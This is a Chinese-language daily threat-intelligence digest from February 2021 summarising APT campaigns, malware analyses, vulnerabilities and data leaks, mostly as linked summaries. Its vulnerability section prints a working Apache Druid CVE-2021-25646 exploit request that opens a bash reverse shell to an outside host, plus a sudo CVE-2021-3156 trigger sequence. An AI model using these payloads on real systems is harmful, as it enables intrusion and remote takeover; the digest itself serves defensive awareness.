TI.360.CN

高级威胁分析

1、Kobalos –对高性能计算基础架构的复杂Linux威胁攻击

ESET研究人员分析了针对高性能计算（HPC）集群的恶意软件，以及其他引人注目的目标。我们对这种小而复杂的恶意软件进行了反向工程，该恶意软件可移植到许多操作系统（包括Linux，BSD，Solaris以及可能的AIX和Windows）中。我们将其命名为Kobalos恶意软件，是因为它的代码量很小且有许多技巧。

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/

2、CryptoMimic组织攻击，针对包括日本在内的全球金融机构（特别是与加密相关的组织）的有针对性的攻击组，并且指出了它与Lazarus的相关性。

https://insight-jp.nttsecurity.com/post/102gpur/cryptomimic

3、隶属朝鲜的APT组织分发的Amadey Troja

https://blog.bushidotoken.net/2021/02/amadey-trojan-distributed-by-dprk.html

4、Konni APT 组织以朝鲜疫情物资话题为诱饵的攻击活动分析

Konni APT 组织是朝鲜半岛地区最具代表性的 APT 组织之一，自 2014 年以来一直持续活动，据悉其背后由朝鲜政府提供支持，该组织经常使用鱼叉式网络钓鱼的攻击手法，经常使用与朝鲜相关的内容或当前社会热点事件来进行攻击活动，该组织的主要目标为韩国政治组织，以及日本、越南、俄罗斯、中国等地区。

    微步情报局近期通过威胁狩猎系统监测到 Konni APT 组织最新攻击活动，经过分析有如下发现：

1. 攻击者以“朝鲜疫情物资”话题相关文章作为诱饵文档进行攻击活动，诱饵文档延续了该组织以往的攻击手法，将正文颜色设置为难以阅读的颜色以诱导用户启用宏。

2. 在文档携带的恶意宏中，从失陷的服务器中下载后门模块并执行。

3. 后门模块为 Amadey 家族木马，攻击者可利用该后门模块进行下一步恶意模块的分发，该组织经常使用此家族木马进行攻击活动。

4. 根据样本关联信息显示，本次攻击活动手法与以往安全机构披露的“隐士”、“BlueSky” 等攻击活动手法类似，另外还与具有相同背景的半岛地区 APT 组织 Kimsuky 有诸多关联之处。

5. 微步在线通过对相关样本、IP 和域名的溯源分析，共提取 31 条相关 IOC，可用于威胁情报检测。微步在线威胁感知平台 TDP、威胁情报管理平台 TIP、威胁情报云 API、互联网安全接入 OneDNS 等均已支持对此次攻击事件和团伙的检测。

https://www.anquanke.com/post/id/230116

5、微软跟踪僵尸网络利用SPAM邮件海量攻击目标，每月百万邮件发送，主要针对金融行业、健康理疗保健、商业金融分销等行业。

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

技术分享

1、SystemBC和Cobalt Strike配合起来的样本分析

https://isc.sans.edu/diary/27060

2、勒索软件运营商正在利用两个VMWare ESXi漏洞CVE-2019-5544和CVE-2020-3992来加密虚拟硬盘。CVE-2019-5544 and CVE-2020-3992,
https://www.zdnet.com/article/ransomware-gangs-are-abusing-vmware-esxi-exploits-to-encrypt-virtual-hard-disks/

3、Trickbot masrv模块分析。

https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/

4、Agent Tesla amps up information stealing attacks，好木马、特斯拉！

https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/

漏洞相关

1、CVE-2021-25646 Apache Druid RCE POC

POST /druid/indexer/v1/sampler HTTP/1.1Host: x.x.x.x:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1045Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/x.x.x.x/4444 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

https://gist.github.com/FanqXu/36c5e0070fd8e0b6646993b4e386a6b1

2、SolarWinds软件中发现了3个新的严重安全漏洞，（CVE-2021-25274和CVE-2021-25275），而在公司的Windows Serv-U FTP服务器中发现了第三个单独的漏洞（CVE-2021-25276）

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/full-system-control-with-new-solarwinds-orion-based-and-serv-u-ftp-vulnerabilities/

3、补上那个供应链的漏洞，SolarWinds Orion API身份验证旁路允许远程执行命令，CVE-2020-10148

https://kb.cert.org/vuls/id/843464

4、CVE-2021-3156  POC

#Credit to @hackerfantastic. I'm just posting this here for those who need to test systems without breaking them.
mkdir POC-CVE-2021-3156cd ./POC-CVE-2021-3156ln -s /usr/bin/sudo ./sudoeditchmod 555 ../POC-CVE-2021-3156/env -i 'AA=a' 'B=b' 'C=c' 'D=d' 'E=e' 'F=f' ./sudoedit -s '1234567890123456789012' ls -al `which sudo`uname -a

数据泄露

1、警察考试数据库暴露了50万印度公民的身份信息

https://cloudsek.com/threatintelligence/police-exam-database-exposes-500k-indian-citizens-pii/

2、drivesure数据泄露，320W用户数据

https://raidforums.com/Thread-SQL-drivesure-com-3-229-101-Customers-Car-Dealership-services-website

网络战与网络情报

1、2020年有组织的社交媒体操纵的全球清单

https://comprop.oii.ox.ac.uk/research/posts/industrialized-disinformation/#Continue

2、看故事：太空网络安全

https://securityintelligence.com/articles/space-cybersecurity-how-lessons-learned-on-earth-apply-in-orbit/

3、X

https://thehill.com/policy/cybersecurity/536838-intel-agency-warns-of-threats-from-china-collecting-sensitive-us-health

本文始发于微信公众号（ThreatPage全球威胁情报）：今日威胁情报2021/2/2-3(第344期）